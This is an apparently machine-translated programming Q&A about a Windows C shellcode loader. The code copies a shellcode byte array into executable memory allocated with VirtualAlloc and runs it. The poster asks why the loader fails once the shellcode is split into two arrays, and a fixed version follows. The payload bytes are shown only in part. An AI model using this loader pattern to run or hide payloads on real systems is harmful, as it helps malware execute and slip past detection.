我有以下至極運行工作正常一個的shellcode:運行的shellcode
unsigned char original[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
"\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71"
;
void *exec = VirtualAlloc(0, sizeof original, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, original, sizeof original);
((void(*)())exec)();
當我嘗試運行存儲在2 distincts陣列相同的shellcode我得到一個訪問衝突:
unsigned char part1[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
;
unsigned char part2[] = "\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71";
//build the final shellcode array
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2)+1);
//concatenation
memcpy(concatenation, part1, sizeof part1);
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
//allocationg memory and running it
void *exec = VirtualAlloc(0, sizeof concatenation, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof concatenation);
((void(*)())exec)();
我試圖讓第二個例子工作,但我得到了訪問衝突錯誤。 我做錯了什麼? 謝謝。
UPDATE
此以下阿蘭上校三十二個建議修改後的代碼,我現在得到以下錯誤: 「TEST.EXE引發了breakpoin噸」
unsigned char part1[] =
"\xd9\xee\xd9\x74\x24\xf4\x58\xbb\xa6\xfb\x51\x8f\x33\xc9\xb1"
"\x62\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\x53\x07\xb9\x0d"
;
unsigned char part2[] = "\x9b\xf8\x3a\x72\x12\x1d\x0b\xb2\x40\x55\x3c\x02\x03\x3b\xb1"
"\xe9\x41\xa8\x42\x9f\x4d\xdf\xe3\x2a\xab\xee\xf4\x07\x8f\x71";
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2));
memcpy(concatenation, part1-1, sizeof part1);
memcpy(concatenation + sizeof part1 , part2, sizeof part2);
printf("%d", sizeof(original));
void *exec = VirtualAlloc(0, sizeof (*concatenation), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof(*concatenation));
((void(*)())exec)();
工作代碼:
unsigned char * concatenation = (unsigned char*)malloc(sizeof (part1)+sizeof(part2));
memcpy(concatenation, part1, sizeof part1);
memcpy(concatenation + sizeof part1-1, part2, sizeof part2);
void *exec = VirtualAlloc(0, sizeof(part1) + sizeof(part2), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, concatenation, sizeof(part1)+sizeof(part2));
((void(*)())exec)();
'sizeof concatenation'是一個指針的大小,因爲'concatenation'是一個指針。 –
你的問題是什麼? – fuz
完成,對不起:)。 – isoman